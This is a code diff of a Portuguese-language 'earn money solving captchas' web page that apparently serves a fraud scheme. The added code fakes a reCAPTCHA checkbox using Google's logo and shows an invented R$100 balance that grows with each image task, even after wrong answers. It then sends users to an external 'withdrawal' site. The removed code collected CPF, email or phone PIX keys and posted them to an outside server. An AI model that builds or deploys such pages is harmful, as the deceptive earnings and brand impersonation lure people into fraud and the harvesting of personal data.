--- a/gpt.html
+++ b/gpt.html
@@ -41,8 +41,33 @@
         }
         .captcha {
             display: flex;
+            align-items: center;
             justify-content: center;
             margin-top: 20px;
+        }
+        .captcha img {
+            width: 48px;
+            height: 48px;
+            margin-right: 10px;
+        }
+        .captcha-checkbox {
+            width: 20px;
+            height: 20px;
+            border: 2px solid #ccc;
+            border-radius: 3px;
+            position: relative;
+            cursor: pointer;
+        }
+        .captcha-checkbox.checked::after {
+            content: '';
+            position: absolute;
+            width: 5px;
+            height: 10px;
+            border: solid #4caf50;
+            border-width: 0 2px 2px 0;
+            transform: rotate(45deg);
+            top: 2px;
+            left: 6px;
         }
         .btn {
             display: block;
@@ -153,7 +178,8 @@
             <p>Complete o Captcha para Começar a sua Primeira Tarefa.</p>
         </div>
         <div class="captcha">
-            <input type="checkbox" id="fakeCaptcha" onchange="captchaCallback()"> Eu não sou um robô
+            <img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="Captcha Logo">
+            <div class="captcha-checkbox" id="customCaptchaCheckbox"></div>
         </div>
         <button class="btn" id="startButton" disabled>Começar Agora</button>
         <div class="error" id="errorMessage"></div>
@@ -188,24 +214,6 @@
         <div class="error" id="errorMessagePage2"></div>
     </div>
 
-    <div class="container" id="tasksCompletedPage" style="display: none;">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="completedSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="content">
-            <img src="assets/img/verificado.png" alt="Verificado" style="max-width: 70px; margin: 0 auto; display: block;">
-            <h2 style="font-size: 21px; text-align: center;">Tarefas Concluídas!</h2>
-            <p>Parabéns, as tarefas foram concluídas com sucesso! Agora, assista um rápido vídeo para estar podendo realizar o seu saque de forma imediata.</p>
-            <p>Toque no botão abaixo para assistir o vídeo e realizar o seu saque.</p>
-        </div>
-        <button class="btn btn-green" id="goToVideoButton">Assistir Vídeo</button>
-    </div>
-
     <div class="container" id="pageFinal" style="display: none;">
         <picture>
             <source srcset="assets/img/img1.webp" type="image/webp">
@@ -228,47 +236,7 @@
             <style>
                 .elementor-element:has(#smartplayer) { width: 100%; }
             </style>
-            <button class="btn btn-green" id="withdrawButton" style="display:none;">Realizar Saque Agora</button>
-        </div>
-    </div>
-
-    <div class="container" id="withdrawPage" style="display: none;">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="withdrawSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="content">
-            <h1>Enviar PIX</h1>
-            <form id="pixForm">
-                <div class="form-group">
-                    <label for="pixType">Tipo de Chave PIX</label>
-                    <select id="pixType" name="pixType" onchange="showPixField()" required>
-                        <option value="">Selecione</option>
-                        <option value="cpf">CPF</option>
-                        <option value="celular">Celular</option>
-                        <option value="email">Email</option>
-                    </select>
-                </div>
-                <div class="form-group" id="cpfField" style="display:none;">
-                    <label for="cpf">CPF</label>
-                    <input type="text" id="cpf" name="cpf" placeholder="Digite seu CPF" oninput="formatCPF()">
-                </div>
-                <div class="form-group" id="emailField" style="display:none;">
-                    <label for="email">Email</label>
-                    <input type="email" id="email" name="email" placeholder="Digite seu email">
-                </div>
-                <div class="form-group" id="phoneField" style="display:none;">
-                    <label for="phone">Celular</label>
-                    <input type="text" id="phone" name="phone" placeholder="Digite seu celular" oninput="formatPhone()">
-                </div>
-                <button type="submit" class="btn btn-green">Enviar PIX</button>
-            </form>
-            <div id="successMessage" class="success-message">PIX enviado com sucesso!</div>
-            <div id="pixErrorMessage" class="error-message"></div>
+            <button class="btn btn-green" id="withdrawButton" style="display:none;" onclick="window.location.href='https://captchapay.org/saque/'">Realizar Saque Agora</button>
         </div>
     </div>
 
@@ -276,92 +244,108 @@
         <img id="popupIcon" src="" alt="Icon">
         <p id="popupText"></p>
     </div>
-    
+
     <script>
-        function showPixField() {
-            const pixType = document.getElementById('pixType').value;
-            document.getElementById('cpfField').style.display = 'none';
-            document.getElementById('emailField').style.display = 'none';
-            document.getElementById('phoneField').style.display = 'none';
-            
-            if (pixType === 'cpf') {
-                document.getElementById('cpfField').style.display = 'block';
-            } else if (pixType === 'email') {
-                document.getElementById('emailField').style.display = 'block';
-            } else if (pixType === 'celular') {
-                document.getElementById('phoneField').style.display = 'block';
+        const tasks = [
+            { imageWebp: 'assets/img/captcha1.webp', imagePng: 'assets/img/captcha1.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém veículos.', answer: 'sim' },
+            { imageWebp: 'assets/img/captcha2.webp', imagePng: 'assets/img/captcha2.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém pessoas.', answer: 'sim' },
+            { imageWebp: 'assets/img/captcha3.webp', imagePng: 'assets/img/captcha3.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém casas.', answer: 'não' },
+            { imageWebp: 'assets/img/captcha4.webp', imagePng: 'assets/img/captcha4.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém motocicletas.', answer: 'sim' },
+            { imageWebp: 'assets/img/captcha5.webp', imagePng: 'assets/img/captcha5.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém animais.', answer: 'não' },
+            { imageWebp: 'assets/img/captcha6.webp', imagePng: 'assets/img/captcha6.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém semáforos.', answer: 'sim' },
+            { imageWebp: 'assets/img/captcha7.webp', imagePng: 'assets/img/captcha7.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém barcos.', answer: 'não' },
+        ];
+        let currentTask = 0;
+        let saldo = 100.00;
+
+        function updateTask() {
+            if (currentTask < tasks.length) {
+                const task = tasks[currentTask];
+                document.getElementById('taskImageWebp').srcset = task.imageWebp;
+                document.getElementById('taskImagePng').srcset = task.imagePng;
+                document.getElementById('taskImage').src = task.imagePng;
+                document.getElementById('taskText').innerText = task.text;
+                document.getElementById('progresso').innerText = `Tarefa ${currentTask + 1} de ${tasks.length}`;
+                document.getElementById('taskSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
+                let taskValue = (saldo * 0.15).toFixed(2);
+                document.getElementById('taskValue').innerText = `Valor da Tarefa: R$${taskValue}`;
+                updateProgressBar();
+            } else {
+                document.getElementById('page2').style.display = 'none';
+                document.getElementById('completedSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
+                document.getElementById('pageFinal').style.display = 'block';
+                new Audio('assets/audio/ok.mp3').play();
             }
         }
 
-        function formatCPF() {
-            let cpf = document.getElementById('cpf').value;
-            cpf = cpf.replace(/\D/g, '');
-            cpf = cpf.replace(/(\d{3})(\d)/, '$1.$2');
-            cpf = cpf.replace(/(\d{3})(\d)/, '$1.$2');
-            cpf = cpf.replace(/(\d{3})(\d{1,2})$/, '$1-$2');
-            document.getElementById('cpf').value = cpf;
+        function updateProgressBar() {
+            const progress = ((currentTask + 1) / tasks.length) * 100;
+            const progressBarFill = document.getElementById('progressBarFill');
+            progressBarFill.style.width = `${progress}%`;
+            progressBarFill.innerText = `${progress.toFixed(0)}%`;
         }
 
-        function formatPhone() {
-            let phone = document.getElementById('phone').value;
-            phone = phone.replace(/\D/g, '');
-            phone = phone.replace(/(\d{2})(\d)/, '($1) $2');
-            phone = phone.replace(/(\d{5})(\d{4})$/, '$1-$2');
-            document.getElementById('phone').value = phone;
+        function showPopup(message, icon, isCorrect) {
+            const popup = document.getElementById('popup');
+            const popupText = document.getElementById('popupText');
+            const popupIcon = document.getElementById('popupIcon');
+            popupText.innerText = message;
+            popupIcon.src = icon;
+            popup.className = isCorrect ? 'popup popup-correct' : 'popup popup-wrong';
+            popup.style.display = 'block';
+            setTimeout(() => {
+                popup.style.display = 'none';
+            }, 3000);
         }
 
-        document.getElementById('pixForm').addEventListener('submit', function(event) {
-            event.preventDefault();
-
-            const pixType = document.getElementById('pixType').value;
-            let key = '';
-
-            if (pixType === 'cpf') {
-                key = document.getElementById('cpf').value;
-            } else if (pixType === 'email') {
-                key = document.getElementById('email').value;
-            } else if (pixType === 'celular') {
-                key = document.getElementById('phone').value;
+        document.getElementById('customCaptchaCheckbox').addEventListener('click', function() {
+            const checkbox = document.getElementById('customCaptchaCheckbox');
+            checkbox.classList.toggle('checked');
+            document.getElementById('startButton').disabled = !checkbox.classList.contains('checked');
+            if (!document.getElementById('startButton').disabled) {
+                document.getElementById('startButton').classList.add('btn-green');
             }
-
-            const data = {
-                key: key,
-                typeKey: pixType,
-                value: 0.05  // Valor fixo de R$0,05
-            };
-
-            fetch('https://api.captchapay.org/captcha/process_pix2.php', {
-                method: 'POST',
-                headers: {
-                    'Content-Type': 'application/json'
-                },
-                body: JSON.stringify(data)
-            })
-            .then(response => response.json())
-            .then(data => {
-                if (data.success) {
-                    document.getElementById('successMessage').style.display = 'block';
-                    document.getElementById('pixErrorMessage').style.display = 'none';
-                    document.getElementById('pixForm').reset();
-                } else {
-                    document.getElementById('pixErrorMessage').textContent = data.message;
-                    document.getElementById('pixErrorMessage').style.display = 'block';
-                    document.getElementById('successMessage').style.display = 'none';
-                }
-            })
-            .catch(error => {
-                document.getElementById('pixErrorMessage').textContent = 'Erro ao enviar PIX. Tente novamente.';
-                document.getElementById('pixErrorMessage').style.display = 'block';
-                document.getElementById('successMessage').style.display = 'none';
-            });
         });
 
-        function captchaCallback() {
-            document.getElementById('startButton').disabled = false;
-            document.getElementById('startButton').classList.add('btn-green');
-        }
+        document.getElementById('startButton').addEventListener('click', function() {
+            document.getElementById('page1').style.display = 'none';
+            document.getElementById('page2').style.display = 'block';
+            updateTask();
+        });
 
-        updateSaldo(); // Atualiza o saldo em todas as divs ao carregar a página
+        document.getElementById('yesButton').addEventListener('click', function() {
+            validateAnswer('sim');
+        });
+
+        document.getElementById('noButton').addEventListener('click', function() {
+            validateAnswer('não');
+        });
+
+        document.getElementById('withdrawButton').addEventListener('click', function() {
+            window.location.href = 'https://captchapay.org/saque/';
+        });
+
+        function validateAnswer(answer) {
+            const correct = tasks[currentTask].answer;
+            let message = '';
+            let icon = '';
+            if (answer === correct) {
+                const commission = (saldo * 0.15).toFixed(2);
+                saldo = parseFloat(saldo) + parseFloat(commission);
+                new Audio('assets/audio/dinheiro.mp3').play();
+                message = `Resposta Correta! Comissão de R$${commission} foi adicionada ao seu saldo, agora você tem R$${saldo.toFixed(2)}.`;
+                icon = 'assets/img/verificado.png';
+                showPopup(message, icon, true);
+            } else {
+                new Audio('assets/audio/erro.mp3').play();
+                message = `Resposta Errada! Comissão foi adicionada ao seu saldo, agora você tem R$${saldo.toFixed(2)}.`;
+                icon = 'assets/img/verificado.png';
+                showPopup(message, icon, false);
+            }
+            document.getElementById('taskSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
+            currentTask++;
+            updateTask();
+        }
     </script>
 </body>
 </html>
